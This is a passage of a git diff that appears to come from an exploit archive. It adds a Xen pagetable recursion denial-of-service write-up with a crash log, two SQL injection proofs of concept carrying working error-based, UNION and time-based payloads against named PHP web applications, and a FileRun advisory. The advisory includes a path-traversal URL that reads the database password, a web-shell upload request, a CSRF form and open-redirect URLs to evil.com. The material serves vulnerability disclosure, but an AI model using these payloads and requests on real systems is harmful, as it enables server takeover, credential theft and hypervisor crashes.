+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF T. Weber / @2017 \ No newline at end of file diff --git a/platforms/linux/dos/43014.txt b/platforms/linux/dos/43014.txt new file mode 100755 index 000000000..2721eb663 --- /dev/null +++ b/platforms/linux/dos/43014.txt @@ -0,0 +1,286 @@ +Xen allows pagetables of the same level to map each other as readonly +in PV domains. This is useful if a guest wants to use the +self-referential pagetable trick for easy access to pagetables +by mapped virtual address. + +When cleaning up a pagetable after the last typed reference to it has been +dropped (via __put_page_type() -> __put_final_page_type() -> free_page_type()), +Xen will recursively drop the typed refcounts of pages referenced by the pagetable, +potentially recursively cleaning them up as well. +For normal pagetables, the recursion depth is bounded by the number of paging levels +the architecture supports. However, no such depth limit exists for pagetables of the +same depth that map each other. + +The attached PoC will set up a chain of 1000 L4 pagetables such that +the first pagetable is type-pinned and each following pagetable is referenced by the +previous one. Then, the type-pin of the first pagetable is removed, and the following +999 pagetables are recursively cleaned up, causing a stack overflow. + +To run the PoC in a PV domain, install kernel headers, then run ./compile, then load the built module via insmod. + +Xen console output caused by running the PoC inside a normal PV domain: + +============================== +(XEN) Xen version 4.8.1 (Debian 4.8.1-1+deb9u3) (ian.jackson@eu.citrix.com) (gcc (Debian 6.3.0-18) 6.3.0 20170516) debug=n Thu Sep 7 18:24:26 UTC 2017 +(XEN) Bootloader: GRUB 2.02~beta3-5 +(XEN) Command line: loglvl=all com1=115200,8n1,pci console=com1 placeholder +(XEN) Video information: +(XEN) VGA is text mode 80x25, font 8x16 +(XEN) Disc information: +(XEN) Found 1 MBR signatures +(XEN) Found 1 EDD information structures +(XEN) Xen-e820 RAM map: +(XEN) 0000000000000000 - 000000000009fc00 (usable) +(XEN) 000000000009fc00 - 00000000000a0000 (reserved) +(XEN) 00000000000f0000 - 0000000000100000 (reserved) +(XEN) 0000000000100000 - 00000000dfff0000 (usable) +(XEN) 00000000dfff0000 - 00000000e0000000 (ACPI data) +(XEN) 00000000fec00000 - 00000000fec01000 (reserved) +(XEN) 00000000fee00000 - 00000000fee01000 (reserved) +(XEN) 00000000fffc0000 - 0000000100000000 (reserved) +(XEN) 0000000100000000 - 0000000120000000 (usable) +(XEN) ACPI: RSDP 000E0000, 0024 (r2 VBOX ) +(XEN) ACPI: XSDT DFFF0030, 003C (r1 VBOX VBOXXSDT 1 ASL 61) +(XEN) ACPI: FACP DFFF00F0, 00F4 (r4 VBOX VBOXFACP 1 ASL 61) +(XEN) ACPI: DSDT DFFF0470, 210F (r1 VBOX VBOXBIOS 2 INTL 20140214) +(XEN) ACPI: FACS DFFF0200, 0040 +(XEN) ACPI: APIC DFFF0240, 0054 (r2 VBOX VBOXAPIC 1 ASL 61) +(XEN) ACPI: SSDT DFFF02A0, 01CC (r1 VBOX VBOXCPUT 2 INTL 20140214) +(XEN) System RAM: 4095MB (4193852kB) +(XEN) No NUMA configuration found +(XEN) Faking a node at 0000000000000000-0000000120000000 +(XEN) Domain heap initialised +(XEN) CPU Vendor: Intel, Family 6 (0x6), Model 78 (0x4e), Stepping 3 (raw 000406e3) +(XEN) found SMP MP-table at 0009fff0 +(XEN) DMI 2.5 present. +(XEN) Using APIC driver default +(XEN) ACPI: PM-Timer IO Port: 0x4008 (32 bits) +(XEN) ACPI: SLEEP INFO: pm1x_cnt[1:4004,1:0], pm1x_evt[1:4000,1:0] +(XEN) ACPI: wakeup_vec[dfff020c], vec_size[20] +(XEN) ACPI: Local APIC address 0xfee00000 +(XEN) ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) +(XEN) ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0]) +(XEN) IOAPIC[0]: apic_id 1, version 32, address 0xfec00000, GSI 0-23 +(XEN) ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) +(XEN) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) +(XEN) ACPI: IRQ0 used by override. +(XEN) ACPI: IRQ2 used by override. +(XEN) ACPI: IRQ9 used by override. +(XEN) Enabling APIC mode: Flat. Using 1 I/O APICs +(XEN) ERST table was not found +(XEN) Using ACPI (MADT) for SMP configuration information +(XEN) SMP: Allowing 1 CPUs (0 hotplug CPUs) +(XEN) IRQ limits: 24 GSI, 184 MSI/MSI-X +(XEN) Not enabling x2APIC: depends on iommu_supports_eim. +(XEN) xstate: size: 0x440 and states: 0x7 +(XEN) CPU0: No MCE banks present. Machine check support disabled +(XEN) Using scheduler: SMP Credit Scheduler (credit) +(XEN) Platform timer is 3.579MHz ACPI PM Timer +(XEN) Detected 2807.850 MHz processor. +(XEN) Initing memory sharing. +(XEN) alt table ffff82d0802bcf38 -> ffff82d0802be594 +(XEN) I/O virtualisation disabled +(XEN) nr_sockets: 1 +(XEN) ENABLING IO-APIC IRQs +(XEN) -> Using new ACK method +(XEN) ..TIMER: vector=0xF0 apic1=0 pin1=2 apic2=-1 pin2=-1 +(XEN) Allocated console ring of 16 KiB. +(XEN) Brought up 1 CPUs +(XEN) build-id: cd504b2b380e2fe1265376aa845a404b9eb86982 +(XEN) CPUIDLE: disabled due to no HPET. Force enable with 'cpuidle'. +(XEN) ACPI sleep modes: S3 +(XEN) VPMU: disabled +(XEN) xenoprof: Initialization failed. Intel processor family 6 model 78is not supported +(XEN) Dom0 has maximum 208 PIRQs +(XEN) NX (Execute Disable) protection active +(XEN) *** LOADING DOMAIN 0 *** +(XEN) Xen kernel: 64-bit, lsb, compat32 +(XEN) Dom0 kernel: 64-bit, PAE, lsb, paddr 0x1000000 -> 0x1f5a000 +(XEN) PHYSICAL MEMORY ARRANGEMENT: +(XEN) Dom0 alloc.: 0000000118000000->000000011a000000 (989666 pages to be allocated) +(XEN) Init. ramdisk: 000000011ed74000->000000011ffff3b5 +(XEN) VIRTUAL MEMORY ARRANGEMENT: +(XEN) Loaded kernel: ffffffff81000000->ffffffff81f5a000 +(XEN) Init. ramdisk: 0000000000000000->0000000000000000 +(XEN) Phys-Mach map: 0000008000000000->00000080007a6370 +(XEN) Start info: ffffffff81f5a000->ffffffff81f5a4b4 +(XEN) Page tables: ffffffff81f5b000->ffffffff81f6e000 +(XEN) Boot stack: ffffffff81f6e000->ffffffff81f6f000 +(XEN) TOTAL: ffffffff80000000->ffffffff82000000 +(XEN) ENTRY ADDRESS: ffffffff81d38180 +(XEN) Dom0 has maximum 1 VCPUs +(XEN) Scrubbing Free RAM on 1 nodes using 1 CPUs +(XEN) ....................................done. +(XEN) Initial low memory virq threshold set at 0x4000 pages. +(XEN) Std. Loglevel: All +(XEN) Guest Loglevel: Nothing (Rate-limited: Errors and warnings) +(XEN) *** Serial input -> DOM0 (type 'CTRL-a' three times to switch input to Xen) +(XEN) Freed 312kB init memory +mapping kernel into physical memory +about to get started... +(XEN) d0 attempted to change d0v0's CR4 flags 00000620 -> 00040660 +(XEN) PCI add device 0000:00:00.0 +(XEN) PCI add device 0000:00:01.0 +(XEN) PCI add device 0000:00:01.1 +(XEN) PCI add device 0000:00:02.0 +(XEN) PCI add device 0000:00:03.0 +(XEN) PCI add device 0000:00:04.0 +(XEN) PCI add device 0000:00:05.0 +(XEN) PCI add device 0000:00:06.0 +(XEN) PCI add device 0000:00:07.0 +(XEN) PCI add device 0000:00:08.0 +(XEN) PCI add device 0000:00:0d.0 + +Debian GNU/Linux 9 xenhost hvc0 + +xenhost login: (XEN) d1 attempted to change d1v0's CR4 flags 00000620 -> 00040660 +(XEN) d1 attempted to change d1v1's CR4 flags 00000620 -> 00040660 +(XEN) *** DOUBLE FAULT *** +(XEN) ----[ Xen-4.8.1 x86_64 debug=n Not tainted ]---- +(XEN) CPU: 0 +(XEN) RIP: e008:[] free_page_type+0xea/0x630 +(XEN) RFLAGS: 0000000000010206 CONTEXT: hypervisor +(XEN) rax: 000000000000a3db rbx: ffff82e000147b60 rcx: 0000000000000000 +(XEN) rdx: ffff830000000000 rsi: 4000000000000000 rdi: 000000000000a3db +(XEN) rbp: 4400000000000001 rsp: ffff8300dfce5ff8 r8: ffff8300dfce7fff +(XEN) r9: ffff82d0802f2980 r10: 0000000000000000 r11: 0000000000000202 +(XEN) r12: 000000000000a3db r13: ffff83011fd74000 r14: ffff83011fd74000 +(XEN) r15: 0000000000000000 cr0: 000000008005003b cr4: 00000000000406a0 +(XEN) cr3: 000000000702d000 cr2: ffff8300dfce5fe8 +(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: e010 cs: e008 +(XEN) Valid stack range: ffff8300dfce6000-ffff8300dfce8000, sp=ffff8300dfce5ff8, tss.esp0=ffff8300dfce7fc0 +(XEN) Xen stack overflow (dumping trace ffff8300dfce6000-ffff8300dfce8000): +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] io_apic.c#ack_edge_ioapic_irq+0x11/0x60 +(XEN) [] io_apic.c#ack_edge_ioapic_irq+0x11/0x60 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#get_page_from_pagenr+0x4e/0x60 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] is_iomem_page+0x9/0x70 +(XEN) [] grant_table.c#__gnttab_unmap_common_complete+0x17c/0x360 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] serial_tx_interrupt+0xe4/0x120 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] do_IRQ+0x22a/0x660 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] common_interrupt+0x5f/0x70 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] put_page_from_l1e+0xb8/0x130 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#put_page_from_l2e+0x7a/0x190 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] mm.c#put_page_from_l4e+0x88/0xc0 +(XEN) [] free_page_type+0x157/0x630 +(XEN) [] mm.c#get_page_from_pagenr+0x4e/0x60 +(XEN) [] mm.c#__put_page_type+0x16f/0x290 +(XEN) [] get_page+0x13/0xf0 +(XEN) [] do_mmuext_op+0x1056/0x1500 +(XEN) [] do_mmuext_op+0/0x1500 +(XEN) [] pv_hypercall+0xf6/0x1c0 +(XEN) [] do_page_fault+0x163/0x4c0 +(XEN) [] entry.o#test_all_events+0/0x2a +(XEN) +(XEN) +(XEN) **************************************** +(XEN) Panic on CPU 0: +(XEN) DOUBLE FAULT -- system shutdown +(XEN) **************************************** +(XEN) +(XEN) Reboot in five seconds... +============================== + +This PoC just causes a DoS, but as far as I can tell, Xen only uses +guard pages for the stack (via memguard_guard_stack()) in debug builds, +which would mean that this is a potentially exploitable issue in release builds. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43014.zip diff --git a/platforms/php/webapps/18356.txt b/platforms/php/webapps/18356.txt index bb8f0a684..c59690105 100755 --- a/platforms/php/webapps/18356.txt +++ b/platforms/php/webapps/18356.txt @@ -9,7 +9,8 @@ Date: References: -===========http://www.vulnerability-lab.com/get_content.php?id=379 +=========== +http://www.vulnerability-lab.com/get_content.php?id=379 VL-ID: diff --git a/platforms/php/webapps/39474.txt b/platforms/php/webapps/39474.txt index 1cd07529b..a18a4eb4e 100755 --- a/platforms/php/webapps/39474.txt +++ b/platforms/php/webapps/39474.txt @@ -5,7 +5,7 @@ Chamilo LMS - Persistent Cross Site Scripting Vulnerability References (Source): ==================== -http://www.vulnerability-lab.com/get_content.php?id= +https://www.vulnerability-lab.com/get_content.php?id=1727 Video: https://www.youtube.com/watch?v=gNZsQjmtiGI diff --git a/platforms/php/webapps/43011.txt b/platforms/php/webapps/43011.txt new file mode 100755 index 000000000..5a6ba7b6e --- /dev/null +++ b/platforms/php/webapps/43011.txt @@ -0,0 +1,41 @@ +# Exploit Title: Career Portal v1.0 - SQL Injection +# Date: 2017-10-17 +# Exploit Author: 8bitsec +# Vendor Homepage: https://codecanyon.net/item/career-portal-online-job-search-script/20767278 +# Software Link: https://codecanyon.net/item/career-portal-online-job-search-script/20767278 +# Version: 1.0 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-17 + +Product & Service Introduction: +=============================== +Career Portal is developed for creating an interactive job vacancy for candidates. + +Technical Details & Description: +================================ + +SQL injection on [keyword] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/job + +Parameter: keyword (POST) + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: keyword=s_term') AND (SELECT 8133 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT (ELT(8133=8133,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('kRoT'='kRoT&location_name[]= + + Type: UNION query + Title: Generic UNION query (NULL) - 25 columns + Payload: keyword=s_term') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a7171,0x594547646454726868515056467764674e59726f4252436844774f41704a507353574e4b6d5a5973,0x71787a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zANd&location_name[]= + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43012.txt b/platforms/php/webapps/43012.txt new file mode 100755 index 000000000..6e95744ab --- /dev/null +++ b/platforms/php/webapps/43012.txt @@ -0,0 +1,37 @@ +# Exploit Title: Wordpress Plugin Car Park Booking - SQL Injection +# Date: 2017-10-17 +# Exploit Author: 8bitsec +# Vendor Homepage: https://codecanyon.net/item/car-park-booking-wordpress-plugin/20284035 +# Software Link: https://codecanyon.net/item/car-park-booking-wordpress-plugin/20284035 +# Version: 13 October 17 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-10-17 + +Product & Service Introduction: +=============================== +Generate more sales, enhance your car park booking service, and have more time to organize the business. + +Technical Details & Description: +================================ + +SQL injection on [space_id] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +https://localhost/[path]/booking-page/?step=3&space_id=9 AND SLEEP(5)&re_price=12 + +Parameter: space_id (GET) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: step=3&space_id=9 AND SLEEP(5)&re_price=12 + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/43015.txt b/platforms/php/webapps/43015.txt new file mode 100755 index 000000000..669d6ff49 --- /dev/null +++ b/platforms/php/webapps/43015.txt @@ -0,0 +1,268 @@ +SEC Consult Vulnerability Lab Security Advisory < 20171018-0 > +======================================================================= + title: Multiple vulnerabilities + product: Afian AB FileRun + vulnerable version: 2017.03.18 + fixed version: 2017.09.18 + impact: critical + homepage: https://www.filerun.com | https://afian.se + found: 2017-08-28 + by: Roman Ferdigg (Office Vienna) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow + Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"FileRun File Manager: access your files anywhere through self-hosted +secure cloud storage, file backup and sharing for your photos, videos, +files and more. Upload and download large files for easy sharing. Google +Drive self-hosted alternative." + +Source: https://www.filerun.com + + +Business recommendation: +------------------------ +By exploiting the vulnerabilities documented in this advisory, an attacker +can compromise the web server which has FileRun installed. User files might +get exposed through this attack. + +SEC Consult recommends not to use FileRun until a thorough security review +has been performed by security professionals and all identified issues have +been resolved. + + +Vulnerability overview/description: +----------------------------------- +1) Path Manipulation +When uploading, downloading or viewing files, FileRun uses a parameter to +specify the path on the file-system. An attacker can manipulate the value +of this parameter to read, create and even overwrite files in certain +folders. An attacker could upload malicious files to compromise the +webserver. In combination with the open redirect and CSRF vulnerability +even an unauthenticated attacker can upload these files to get a shell. +Through the shell all user files can be accessed. + + +2) Stored Cross Site Scripting (XSS) via File Upload +The application allows users to upload different file types. It is also +possible to upload HTML files or to create them via the application's text +editor. Files can be shared using a link or within the FileRun application +(in the enterprise version). An attacker can inject JavaScript in HTML +files to attack other users or simply create a phishing site to steal user +credentials. + +Remark: +In the standard configuration of the FileRun docker image the HttpOnly +cookie flag is not set, which means that authentication cookies can be +accessed in an XSS attack. This allows easy session hijacking as well. + + +3) Cross Site Request Forgery (CSRF) +The application does not implement CSRF protection. An attacker can exploit +this vulnerability to execute arbitrary requests with the privileges of the +victim. The only requirement is that a victim visits a malicious webpage. +Such a page could be hosted on the FileRun server itself and shared with +other users as described in vulnerability 2. +Besides others, the following actions can be performed via CSRF if the +victim has administrative privileges: + - Create or delete users + - Change permissions rights of users + - Change user passwords + +If the victim has no administrative privileges, for example the following +actions can be performed: + - Upload files + - Change the email address (for password recovery) + + +4) Open Redirect Vulnerabilities +An open redirect vulnerability in the login and logout pages allows an +attacker to redirect users to arbitrary web sites. The redirection host +could be used for phishing attacks (e.g. to steal user credentials) or for +running browser exploits to infect a victim's machine with malware. The open +redirect in the login page could also be used to exploit CSRF (see above). +Because the server name in the manipulated link is identical to the +original site, phishing attempts may have a more trustworthy appearance. + + +Proof of concept: +----------------- +1) Path Manipulation +The URL below is used to read the application file "autoconfig.php", which +contains the username and cleartext password of the database. + +URL: +http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/autoconfig.php + + +This post request is used to upload a PHP shell in the writable folder +avatars: + +POST /?module=fileman_myfiles§ion=ajax&page=up HTTP/1.1 +Host: $DOMAIN +[...] +Content-Type: multipart/form-data; boundary=---------------------------293712729522107 +Cookie: FileRunSID=t5h7lm99r1ff0quhsajcudh7t0; language=english +DNT: 1 +Connection: close + +-----------------------------293712729522107 +Content-Disposition: form-data; name="flowTotalSize" + +150 +-----------------------------293712729522107 +Content-Disposition: form-data; name="flowIsFirstChunk" + +1 +-----------------------------293712729522107 +Content-Disposition: form-data; name="flowIsLastChunk" + +1 +-----------------------------293712729522107 +Content-Disposition: form-data; name="flowFilename" + +shell.php +-----------------------------293712729522107 +Content-Disposition: form-data; name="path" + +/var/www/html/system/data/avatars/ +-----------------------------293712729522107 +Content-Disposition: form-data; name="file"; filename="shell.php" +Content-Type: application/octet-stream + +*web shell payload here* + +-----------------------------293712729522107-- + +To execute the uploaded shell a .htaccess file with the contents below can +be uploaded in the same folder. + +Content of .htaccess file: + + Order allow,deny + Allow from all + + +The uploaded shell can be accessed by the following URL: +http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/avatars/shell.php + +2) Stored Cross Site Scripting (XSS) via File Upload +An HTML file with JavaScript code can be easily uploaded to attack other users. +No PoC necessary. + +3) Cross Site Request Forgery +An example for a CSRF attack would be the following request which changes +the email address of the victim: + + + +
+ + + + + + + + + + +
+ + + +The new email address can be used by the attacker to reset the password of +the victim. + + +4) Open Redirect Vulnerabilites +The URL below can be used to forward a user to an arbitrary website after +the login: +http://$DOMAIN/?redirectAfterLogin=aHR0cDovL3d3dy5ldmlsLmNvbQ== + +The value of the redirect parameter needs to be base64 encoded. + +To redirect a user after logout, following URL can be used: +http://$DOMAIN/?module=fileman&page=logout&redirect=http://evil.com + +In this case for a successful exploit, the victim has to be logged in. + + +Vulnerable / tested versions: +----------------------------- +The regular version of FileRun 2017.03.18 has been tested. It is assumed +earlier versions of FileRun are also vulnerable to the issues. + + +Vendor contact timeline: +------------------------ +2017-08-31: Contacting vendor through info@afian.se, info@filerun.com +2017-09-01: Sending unencrypted advisory as requested by vendor +2017-09-04: FileRun fixed the vulnerability "Path Manipulation" +2017-09-12: Requesting a status update +2017-09-13: FileRun informed us that a patch for all vulnerabilities will + be released before 2017-09-20 +2017-09-16: Patch available +2017-10-18: Public release of security advisory + + +Solution: +--------- +Update to the latest version available (see https://docs.filerun.com/updating). +According to FileRun, all the vulnerabilities are fixed in release +2017.09.18 or higher. + +For further information see: +https://www.filerun.com/changelog + + +Workaround: +----------- +No workaround available. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow +Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF Roman Ferdigg / @2017 \ No newline at end of file